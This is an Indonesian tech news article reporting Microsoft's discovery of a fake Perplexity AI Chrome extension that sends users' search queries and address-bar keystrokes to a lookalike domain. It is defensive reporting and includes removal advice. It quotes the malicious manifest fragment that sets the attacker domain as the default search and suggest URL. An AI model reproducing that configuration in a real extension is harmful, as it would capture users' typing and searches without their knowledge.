Google Kecolongan Lagi! Ekstensi Perplexity AI Palsu di Chrome Ternyata Malware Pencuri Data

Jika selama ini kamu merasa memasang ekstensi dari Chrome Web Store sudah pasti aman, mungkin sudah saatnya mulai berpikir dua kali. Pasalnya, Google kembali kecolongan setelah sebuah ekstensi palsu yang mengatasnamakan Perplexity AI berhasil lolos ke Chrome Web Store dan ternyata berisi malware yang diam-diam mencuri aktivitas pengguna.

Dan yang lebih mengkhawatirkannya, ekstensi tersebut sempat tersedia untuk didownload sebelum akhirnya dihapus oleh Google.

Bukan Perplexity AI Asli

Satu hal yang pasti, berdasarkan laporan dari Microsoft Defender Security Research Team, ekstensi berbahaya tersebut menggunakan nama “Search for perplexity ai” agar terlihat seperti aplikasi resmi dari Perplexity AI.

Namun setelah diinstal, ekstensi ini ternyata tidak terhubung ke layanan resmi Perplexity, melainkan mengarahkan seluruh aktivitas pencarian pengguna ke domain palsu perplexity-ai[.]online, bukan ke perplexity.ai yang asli.

TONTON JUGA:

Dan tentu, seluruh pencarian yang dilakukan oleh pengguna, bisa direkam oleh server milik pelaku.

Bahkan Ketikan Sebelum Enter Pun Ikut Direkam

Yang bikin kasus ini makin mengkhawatirkan adalah kemampuan malware tersebut, dimana menurut Microsoft, ekstensi ini tidak hanya mencatat hasil pencarian setelah pengguna menekan tombol Enter, tetapi juga mampu merekam setiap karakter yang diketik secara real-time melalui fitur suggest_url.

Dengan kata lain, setiap kata yang diketik di address bar Chrome dapat dikirim terlebih dahulu ke server milik pelaku sebelum pengguna benar-benar melakukan pencarian.

"chrome_settings_overrides": { 
"search_provider": {
"name": "Perplexity Search",
"keyword": "perplexity",
"is_default": true,
"search_url": "hxxps://perplexity-ai[.]online/search/{searchTerms}",
"favicon_url": "hxxps://perplexity-ai[.]online/favicon.ico",
"suggest_url": "hxxps://perplexity-ai[.]online/search?output=firefox&q={searchTerms}"
}
}

Sekarang Sudah Dihapus, Tapi…

Nah kabar baiknya, Google kini sudah menghapus ekstensi tersebut dari Chrome Web Store. Namun masalahnya, menghapus dari Chrome Web Store tidak otomatis menghapusnya dari komputer pengguna.

Artinya nih guys, siapapun yang sempat menginstalnya masih tetap berisiko hingga menghapus ekstensi tersebut secara manual, jadi pastikan kamu sudah menghapus ekstensi yang mencurigakan di browser kamu.

Caranya, buka halaman chrome://extension > pastikan bahwa tidak ada ekstensi dengan ID flkebkiofojicogddingbdmcmkpbplcd terinstall di perangkat kamu.


Nah secara umum, kasus seperti ini sebenarnya bukan yang pertama. Dalam beberapa tahun terakhir, Chrome Web Store berulang kali ditemukan menjadi tempat lolosnya berbagai ekstensi berbahaya, mulai dari pencuri cookie, pencuri password, hingga malware yang memata-matai aktivitas browsing pengguna.

Oleh karena itu, meskipun Chrome Web Store merupakan toko resmi Google, bukan berarti seluruh ekstensi yang tersedia di sana dapat dipercaya begitu saja sehingga kita sebagai pengguna harus lebih aware dan berhati hati akan ekstensi yang kita install dan pakai.

Nah bagaimana menurutmu mengenai temuan ini? komen dibawah guys

Via : Microsoft


Catatan Penulis : WinPoin sepenuhnya bergantung pada iklan untuk tetap hidup dan menyajikan konten teknologi berkualitas secara gratis — jadi jika kamu menikmati artikel dan panduan di situs ini, mohon whitelist halaman ini di AdBlock kamu sebagai bentuk dukungan agar kami bisa terus berkembang dan berbagi insight untuk pengguna Indonesia. Kamu juga bisa mendukung kami secara langsung melalui dukungan di Saweria. Terima kasih.

Gylang Satria

Tech writer yang sehari‑hari berkutat dengan Windows 11, Linux Ubuntu, dan Samsung S24. Punya pertanyaan atau butuh diskusi? Tag @gylang_satria di Disqus. Untuk kolaborasi, email saja ke [email protected]

Post navigation